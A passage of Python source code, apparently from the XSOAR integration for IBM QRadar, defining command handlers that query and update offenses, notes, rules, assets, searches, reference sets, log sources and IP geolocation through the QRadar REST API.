- range: Range of notes to return for the offense corresponding to the offense ID (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
offense_id: int = int(args['offense_id'])
note_id = args.get('note_id')
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.offense_notes_list(offense_id, range_, note_id, filter_, fields)
outputs = sanitize_outputs(response, NOTES_OLD_NEW_MAP)
headers = build_headers(['ID', 'Text', 'CreatedBy', 'CreateTime'], set(NOTES_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown(f'Offense Notes List For Offense ID {offense_id}', outputs, headers,
removeNull=True),
outputs_prefix='QRadar.Note',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_offense_notes_create_command(client: Client, args: Dict) -> CommandResults:
"""
Create a new note for the offense corresponding to the given offense ID with the note text given
to QRadar service.
possible arguments:
- offense_id: The offense ID to add note to.
- note_text: The note text.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
offense_id: int = int(args['offense_id'])
note_text: str = args.get('note_text', '')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.offense_notes_create(offense_id, note_text, fields)
outputs = sanitize_outputs(response, NOTES_OLD_NEW_MAP)
headers = build_headers(['ID', 'Text', 'CreatedBy', 'CreateTime'], set(NOTES_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Create Note', outputs, headers, removeNull=True),
outputs_prefix='QRadar.Note',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_rules_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of rules from QRadar service.
possible arguments:
- rule_id: Retrieves details of the specific rule that corresponds to the ID given.
- rule_type: Retrieves rules corresponding to the given rule type.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
rule_id = args.get('rule_id')
rule_type = args.get('rule_type')
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
if not filter_ and rule_type:
filter_ = f'type={rule_type}'
# if this call fails, raise an error and stop command execution
response = client.rules_list(rule_id, range_, filter_, fields)
outputs = sanitize_outputs(response, RULES_OLD_NEW_MAP)
headers = build_headers(['ID', 'Name', 'Type'], set(RULES_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Rules List', outputs, headers=headers, removeNull=True),
outputs_prefix='QRadar.Rule',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_rule_groups_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of rule groups from QRadar service.
possible arguments:
- rule_group_id: Retrieves details of the specific rule group that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
rule_group_id = arg_to_number(args.get('rule_group_id'))
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.rule_groups_list(range_, rule_group_id, filter_, fields)
outputs = sanitize_outputs(response, RULES_GROUP_OLD_NEW_MAP)
headers = build_headers(['ID', 'Name', 'Description', 'Owner'], set(RULES_GROUP_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Rules Group List', outputs, headers, removeNull=True),
outputs_prefix='QRadar.RuleGroup',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_assets_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of assets from QRadar service.
possible arguments:
- asset_id: Retrieves details of the specific asset that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
asset_id = args.get('asset_id')
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# If asset ID was given, override filter if both filter and asset ID were given.
if asset_id:
filter_ = f'id={asset_id}'
full_enrichment = True if asset_id else False
# if this call fails, raise an error and stop command execution
response = client.assets_list(range_, filter_, fields)
enriched_outputs = enrich_assets_results(client, response, full_enrichment)
assets_results = dict()
assets_hr = []
endpoints = []
for output in enriched_outputs:
output['Asset']['hostnames'] = add_iso_entries_to_dict(output.get('Asset', dict()).get('hostnames', []))
output['Asset']['users'] = add_iso_entries_to_dict(output.get('Asset', dict()).get('users', []))
output['Asset']['products'] = add_iso_entries_to_dict(output.get('Asset', dict()).get('products', []))
output['Asset'] = sanitize_outputs(output.get('Asset'), ASSET_OLD_NEW_MAP)[0]
assets_hr.append(output['Asset'])
assets_results[f'''QRadar.Asset(val.ID === "{output['Asset']['ID']}")'''] = output['Asset']
sanitized_endpoint = remove_empty_elements(output.get('Endpoint', dict()))
if sanitized_endpoint:
endpoints.append(sanitized_endpoint)
asset_human_readable = tableToMarkdown('Assets List', assets_hr, removeNull=True)
endpoints_human_readable = tableToMarkdown('Endpoints', endpoints, removeNull=True)
if endpoints:
assets_results['Endpoint'] = endpoints
return CommandResults(
readable_output=asset_human_readable + endpoints_human_readable,
outputs=assets_results,
raw_response=response
)
def qradar_saved_searches_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of saved searches from QRadar service.
possible arguments:
- saved_search_id: Retrieves details of the specific saved search that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
saved_search_id = args.get('saved_search_id')
timeout: Optional[int] = arg_to_number(args.get('timeout', DEFAULT_TIMEOUT_VALUE))
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.saved_searches_list(range_, timeout, saved_search_id, filter_, fields)
outputs = sanitize_outputs(response, SAVED_SEARCH_OLD_NEW_MAP)
headers = build_headers(['ID', 'Name', 'Description'], set(SAVED_SEARCH_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Saved Searches List', outputs, headers, removeNull=True),
outputs_prefix='QRadar.SavedSearch',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_searches_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of searches IDs from QRadar service.
possible arguments:
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
# if this call fails, raise an error and stop command execution
response = client.searches_list(range_, filter_)
outputs = [{'SearchID': search_id} for search_id in response]
return CommandResults(
readable_output=tableToMarkdown('Search ID List', outputs),
outputs_prefix='QRadar.SearchID',
outputs_key_field='SearchID',
outputs=outputs,
raw_response=response
)
def qradar_search_create_command(client: Client, args: Dict) -> CommandResults:
"""
Create a search in QRadar service.
possible arguments:
- query_expression: The AQL query to execute. Mutually exclusive with saved_search_id.
- saved_search_id: Saved search ID to execute. Mutually exclusive with query_expression.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
query_expression = args.get('query_expression')
saved_search_id = args.get('saved_search_id')
# if this call fails, raise an error and stop command execution
response = client.search_create(query_expression, saved_search_id)
outputs = sanitize_outputs(response, SEARCH_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown('Create Search', outputs),
outputs_prefix='QRadar.Search',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_search_status_get_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves search status from QRadar service.
possible arguments:
- search_id (Required): The search ID to retrieve its status.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
search_id: str = args.get('search_id', '')
# if this call fails, raise an error and stop command execution
response = client.search_status_get(search_id)
outputs = sanitize_outputs(response, SEARCH_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown(f'Search Status For Search ID {search_id}', outputs),
outputs_prefix='QRadar.Search',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_search_results_get_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves search results from QRadar service.
possible arguments:
- search_id: Search ID to retrieve its results.
- output_path: If specified, will be context output path prefix.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
search_id: str = args.get('search_id', '')
output_path = args.get('output_path')
# Using or instead of default value for QRadarFullSearch backward compatibility
range_ = f'''items={args.get('range') or DEFAULT_RANGE_VALUE}'''
# if this call fails, raise an error and stop command execution
response = client.search_results_get(search_id, range_)
if not response:
raise DemistoException('Unexpected response from QRadar service.')
result_key = list(response.keys())[0]
outputs = sanitize_outputs(response.get(result_key))
outputs_prefix = output_path if output_path else f'QRadar.Search(val.ID === "{search_id}").Result.{result_key}'
return CommandResults(
readable_output=tableToMarkdown(f'Search Results For Search ID {search_id}', outputs),
outputs_prefix=outputs_prefix,
outputs=outputs,
raw_response=response
)
def qradar_reference_sets_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of reference sets from QRadar service.
possible arguments:
- ref_name: Retrieves details of the specific reference that corresponds to the reference name given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name = args.get('ref_name')
convert_date_value = argToBoolean(args.get('date_value', False))
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.reference_sets_list(range_, ref_name, filter_, fields)
if ref_name:
outputs = dict(response)
if convert_date_value and outputs.get('element_type') == 'DATE':
for data_entry in outputs.get('data', []):
data_entry['value'] = get_time_parameter(data_entry.get('value'), iso_format=True)
outputs['data'] = sanitize_outputs(outputs.get('data', []), REFERENCE_SET_DATA_OLD_NEW_MAP)
else:
outputs = response
final_outputs = sanitize_outputs(outputs, REFERENCE_SETS_OLD_NEW_MAP)
headers = build_headers(['Name', 'ElementType', 'Data', 'TimeToLive', 'TimeoutType'],
set(REFERENCE_SETS_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Reference Sets List', final_outputs, headers, removeNull=True),
outputs_prefix='QRadar.Reference',
outputs_key_field='Name',
outputs=final_outputs,
raw_response=response
)
def qradar_reference_set_create_command(client: Client, args: Dict) -> CommandResults:
"""
Create a new reference set.
possible arguments:
- ref_name (Required): The name of the new reference set.
- element_type (Required): The type of the new reference set. Can be ALN (alphanumeric),
ALNIC (alphanumeric ignore case), IP (IP address), NUM (numeric),
PORT (port number) or DATE.
- timeout_type: Indicates if the time_to_live interval is based on when the data was first seen or last seen.
The allowed values are 'FIRST_SEEN', 'LAST_SEEN' and 'UNKNOWN'. The default value is 'UNKNOWN'.
- time_to_live: The time to live interval, for example: '1 month' or '5 minutes'.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name: str = args.get('ref_name', '')
element_type: str = args.get('element_type', '')
timeout_type = args.get('timeout_type')
time_to_live = args.get('time_to_live')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.reference_set_create(ref_name, element_type, timeout_type, time_to_live, fields)
outputs = sanitize_outputs(response, REFERENCE_SETS_OLD_NEW_MAP)
headers = build_headers(['Name', 'ElementType', 'Data', 'TimeToLive', 'TimeoutType'],
set(REFERENCE_SETS_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Reference Set Create', outputs, headers, removeNull=True),
outputs_prefix='QRadar.Reference',
outputs_key_field='Name',
outputs=outputs,
raw_response=response
)
def qradar_reference_set_delete_command(client: Client, args: Dict) -> CommandResults:
"""
Removes a reference set or purges its contents.
possible arguments:
- ref_name (Required): The name of the new reference set.
- purge_only: Indicates if the reference set should have its contents purged (true),
keeping the reference set structure. If the value is 'false',
or not specified the reference set is removed completely.
Default is 'false'.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name: str = args.get('ref_name', '')
purge_only = args.get('purge_only')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.reference_set_delete(ref_name, purge_only, fields)
return CommandResults(
raw_response=response,
readable_output=f'Request to delete reference {ref_name} was submitted.'
f''' Current deletion status: {response.get('status', 'Unknown')}''')
def qradar_reference_set_value_upsert_command(client: Client, args: Dict) -> CommandResults:
"""
Update or insert new value to a reference set from QRadar service.
possible arguments:
- ref_name (Required): The reference name to insert/update a value for.
- values (Required): Comma separated list. All the values to be inserted/updated.
- source: An indication of where the data originated. Default is reference data api.
- date_value: Boolean, specifies if values given are dates or not.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name: str = args.get('ref_name', '')
values: List[str] = argToList(args.get('value', ''))
if not values:
raise DemistoException('Value to insert must be given.')
source = args.get('source')
date_value = argToBoolean(args.get('date_value', False))
fields = args.get('fields')
if date_value:
values = [get_time_parameter(value, epoch_format=True) for value in values]
# if one of these calls fail, raise an error and stop command execution
if len(values) == 1:
response = client.reference_set_value_upsert(ref_name, values[0], source, fields)
else:
response = client.indicators_upload(ref_name, values, fields)
outputs = sanitize_outputs(response, REFERENCE_SETS_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown('Reference Update Create', outputs,
['Name', 'ElementType', 'TimeToLive', 'TimeoutType', 'NumberOfElements',
'CreationTime'], removeNull=True),
outputs_prefix='QRadar.Reference',
outputs_key_field='Name',
outputs=outputs,
raw_response=response
)
def qradar_reference_set_value_delete_command(client: Client, args: Dict) -> CommandResults:
"""
Delete a value in reference set from QRadar service.
possible arguments:
- ref_name (Required): The reference name to insert/update a value for.
- value (Required): Value to be deleted.
- date_value: Boolean, specifies if values given are dates or not.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name: str = args.get('ref_name', '')
value: str = args.get('value', '')
date_value = argToBoolean(args.get('date_value', False))
original_value = value
if date_value:
value = get_time_parameter(original_value, epoch_format=True)
# if this call fails, raise an error and stop command execution
response = client.reference_set_value_delete(ref_name, value)
human_readable = f'### value: {original_value} of reference: {ref_name} was deleted successfully'
return CommandResults(
readable_output=human_readable,
raw_response=response
)
def qradar_domains_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of domains sets from QRadar service.
If you do not have the System Administrator or Security Administrator permissions,
then for each domain assigned to your security profile you can only view the values
for the id and name fields. All other values return null.
possible arguments:
- domain_id: Retrieves details of the specific domain that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
# backward compatibility for domain_id argument named is 'id' in QRadar v2.
domain_id = args.get('domain_id') or args.get('id')
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.domains_list(domain_id, range_, filter_, fields)
outputs = sanitize_outputs(response, DOMAIN_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown('Domains List', outputs, removeNull=True),
outputs_prefix='QRadar.Domains',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_indicators_upload_command(client: Client, args: Dict) -> CommandResults:
"""
Uploads list of indicators from Demisto to a reference set in QRadar service.
possible arguments:
- ref_name (Required): Name of the reference set to upload indicators to.
- query: The query for getting indicators from Demisto.
- limit: Maximum number of indicators to fetch from Demisto.
- page: The page from which to get the indicators.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name: str = args.get('ref_name', '')
query = args.get('query')
limit = arg_to_number(args.get('limit', DEFAULT_LIMIT_VALUE))
page = arg_to_number(args.get('page', 0))
fields = args.get('fields')
# Backward compatibility for QRadar V2 command. Create reference set for given 'ref_name' if does not exist.
element_type = args.get('element_type', '')
timeout_type = args.get('timeout_type')
time_to_live = args.get('time_to_live')
try:
client.reference_sets_list(ref_name=ref_name)
except DemistoException as e:
# Create reference set if does not exist
if e.message and f'{ref_name} does not exist' in e.message:
# if this call fails, raise an error and stop command execution
client.reference_set_create(ref_name, element_type, timeout_type, time_to_live)
else:
raise e
search_indicators = IndicatorsSearcher(page=page)
indicators = search_indicators.search_indicators_by_version(query=query, size=limit).get('iocs', [])
indicators_data = [{'Indicator Value': indicator.get('value'), 'Indicator Type': indicator.get('indicator_type')}
for indicator in indicators if 'value' in indicator and 'indicator_type' in indicator]
indicator_values: List[Any] = [indicator.get('Indicator Value') for indicator in indicators_data]
if not indicators_data:
return CommandResults(
readable_output=f'No indicators were found for reference set {ref_name}'
)
# if this call fails, raise an error and stop command execution
response = client.indicators_upload(ref_name, indicator_values, fields)
outputs = sanitize_outputs(response)
reference_set_hr = tableToMarkdown(f'Indicators Upload For Reference Set {ref_name}', outputs)
indicators_uploaded_hr = tableToMarkdown('Indicators Uploaded', indicators_data)
return CommandResults(
readable_output=f'{reference_set_hr}\n{indicators_uploaded_hr}',
outputs_prefix='QRadar.Reference',
outputs_key_field='name',
outputs=outputs,
raw_response=response
)
def flatten_nested_geolocation_values(geolocation_dict: Dict, dict_key: str, nested_value_keys: List[str]) -> Dict:
"""
Receives output from geolocation IPs command, and does:
1) flattens output, takes nested keys values.
2) Converts keys to prefix of 'dict_key' and suffix of nested key as camel case.
Args:
geolocation_dict (Dict): The dict to flatten.
dict_key (Dict): The key of the inner dict to use his values.
nested_value_keys (Dict): The keys inside inner dict to take.
Returns:
(Dict): dict of ({dict_key_name}{camel case nested key}: {nested key value}
"""
return {f'{camelize_string(dict_key)}{camelize_string(k)}': geolocation_dict.get(dict_key, dict()).get(k) for k in
nested_value_keys}
def qradar_geolocations_for_ip_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves the MaxMind geoip data for the given IP addresses.
possible arguments:
- ip (Required): Comma separated list. the IPs to retrieve data for.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ips = argToList(args.get('ip'))
filter_ = f'''ip_address IN ({','.join(map(lambda ip: f'"{str(ip)}"', ips))})'''
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.geolocations_for_ip(filter_, fields)
outputs = []
for output in response:
city_values = flatten_nested_geolocation_values(output, 'city', ['name'])
continent_values = flatten_nested_geolocation_values(output, 'continent', ['name'])
location_values = flatten_nested_geolocation_values(output, 'location',
['accuracy_radius', 'average_income', 'latitude',
'longitude', 'metro_code', 'population_density',
'timezone'])
physical_country_values = flatten_nested_geolocation_values(output, 'physical_country', ['iso_code', 'name'])
registered_country_values = flatten_nested_geolocation_values(output, 'registered_country',
['iso_code', 'name'])
represented_country_values = flatten_nested_geolocation_values(output, 'represented_country',
['iso_code', 'name', 'confidence'])
subdivision_values = flatten_nested_geolocation_values(output, 'subdivision',
['name', 'iso_code', 'confidence'])
non_nested_values = {
'IPAddress': output.get('ip_address'),
'Traits': output.get('traits'),
'Coordinates': output.get('geo_json', dict()).get('coordinates'),
'PostalCode': output.get('postal', dict()).get('postal_code'),
'PostalCodeConfidence': output.get('postal', dict()).get('confidence')
}
final_output = dict(city_values, **continent_values, **location_values, **physical_country_values,
**registered_country_values, **represented_country_values, **subdivision_values,
**non_nested_values)
outputs.append(final_output)
final_outputs = sanitize_outputs(outputs)
return CommandResults(
readable_output=tableToMarkdown('Geolocation For IP', final_outputs),
outputs_prefix='QRadar.GeoForIP',
outputs_key_field='IPAddress',
outputs=final_outputs,
raw_response=response
)
def qradar_log_sources_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves a list of log sources from QRadar service.
possible arguments:
- qrd_encryption_algorithm: The algorithm to use for encrypting the sensitive data of this
endpoint. Using AES 128
- qrd_encryption_password: The password to use for encrypting the sensitive data of this endpoint.
If argument was not given, will be randomly generated.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
qrd_encryption_algorithm: str = args.get('qrd_encryption_algorithm', 'AES128')
qrd_encryption_password: str = args.get('qrd_encryption_password', secrets.token_urlsafe(20))
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.log_sources_list(qrd_encryption_algorithm, qrd_encryption_password, range_, filter_, fields)
outputs = sanitize_outputs(response, LOG_SOURCES_OLD_NEW_MAP)
headers = build_headers(['ID', 'Name', 'Description'], set(LOG_SOURCES_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Log Sources List', outputs, headers, removeNull=True),
outputs_prefix='QRadar.LogSource',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_get_custom_properties_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves a list of event regex properties from QRadar service.
possible arguments:
- field_names: A comma-separated list of names of an exact properties to search for.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
limit = arg_to_number(args.get('limit', DEFAULT_LIMIT_VALUE))
if limit:
range_ = f'items=0-{limit - 1}'
else:
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
like_names = argToList(args.get('like_name'))
field_names = argToList(args.get('field_name'))
filter_ = args.get('filter', '')
fields = args.get('fields')
if not filter_:
if field_names:
filter_ += f'''name IN ({','.join(map(lambda name: f'"{str(name)}"', field_names))})'''
if like_names:
filter_ += ' or '.join(map(lambda like: f' name ILIKE "%{like}%"', like_names))
# if this call fails, raise an error and stop command execution
response = client.custom_properties(range_, filter_, fields)
outputs = sanitize_outputs(response)
return CommandResults(
readable_output=tableToMarkdown('Custom Properties', outputs, removeNull=True),
outputs_prefix='QRadar.Properties',
outputs_key_field='identifier',
outputs=outputs,
raw_response=response
)
def perform_ips_command_request(client: Client, args: Dict[str, Any], is_destination_addresses: bool):
"""
Performs request to QRadar IPs endpoint.
Args:
client (Client): Client to perform the request to QRadar service.
args (Dict[str, Any]): XSOAR arguments.
is_destination_addresses (bool): Whether request is for destination addresses or source addresses.
Returns:
- Request response.
"""
range_: str = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_: Optional[str] = args.get('filter')
fields: Optional[str] = args.get('fields')
address_type = 'local_destination' if is_destination_addresses else 'source'
ips_arg_name: str = f'{address_type}_ip'
ips: List[str] = argToList(args.get(ips_arg_name, []))
if ips and filter_:
raise DemistoException(f'Both filter and {ips_arg_name} have been supplied. Please supply only one.')
if ips:
filter_ = ' OR '.join([f'{ips_arg_name}="{ip_}"' for ip_ in ips])
url_suffix = f'{address_type}_addresses'
# if this call fails, raise an error and stop command execution
response = client.get_addresses(url_suffix, filter_, fields, range_)
return response
def qradar_ips_source_get_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Get source IPS from QRadar service.
Args:
client (Client): Client to perform API calls to QRadar service.
args (Dict[str, Any): XSOAR arguments.
Returns:
(CommandResults).
"""
response = perform_ips_command_request(client, args, is_destination_addresses=False)
outputs = sanitize_outputs(response, SOURCE_IPS_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown('Source IPs', outputs),
outputs_prefix='QRadar.SourceIP',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_ips_local_destination_get_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Get local destination IPS from QRadar service.
Args:
client (Client): Client to perform API calls to QRadar service.
args (Dict[str, Any): XSOAR arguments.
Returns:
(CommandResults).
"""
response = perform_ips_command_request(client, args, is_destination_addresses=True)
outputs = sanitize_outputs(response, LOCAL_DESTINATION_IPS_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown('Local Destination IPs', outputs),
outputs_prefix='QRadar.LocalDestinationIP',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_reset_last_run_command() -> str:
"""
Puts the reset flag inside integration context.
Returns:
(str): 'fetch-incidents was reset successfully'.
"""
ctx = get_integration_context()
ctx[RESET_KEY] = True
set_to_integration_context_with_retries(ctx)
return 'fetch-incidents was reset successfully.'
def qradar_get_mapping_fields_command(client: Client) -> Dict:
"""
Returns Dict object containing the list of fields for an incident type.
This command should be used for debugging purposes.
Args:
client (Client): Client to perform API calls.
Returns:
(Dict): Contains all the mapping.
"""
offense = {
'username_count': 'int',
'description': 'str',
'rules': {
'id': 'int',
'type': 'str',
'name': 'str'
},
'event_count': 'int',
'flow_count': 'int',
'assigned_to': 'NoneType',
'security_category_count': 'int',
'follow_up': 'bool',
'source_address_ids': 'str',
'source_count': 'int',
'inactive': 'bool',
'protected': 'bool',
'closing_user': 'str',
'destination_networks': 'str',
'source_network': 'str',
'category_count': 'int',
'close_time': 'str',
'remote_destination_count': 'int',
'start_time': 'str',
'magnitude': 'int',
'last_updated_time': 'str',
'credibility': 'int',
'id': 'int',
'categories': 'str',
'severity': 'int',
'policy_category_count': 'int',
'closing_reason_id': 'str',
'device_count': 'int',
'offense_type': 'str',
'relevance': 'int',
'domain_id': 'int',
'offense_source': 'str',
'local_destination_address_ids': 'int',
'local_destination_count': 'int',
'status': 'str',
'domain_name': 'str'
}
events = {
'events': {
'qidname_qid': 'str',
'logsourcename_logsourceid': 'str',
'categoryname_highlevelcategory': 'str',
'categoryname_category': 'str',
'protocolname_protocolid': 'str',
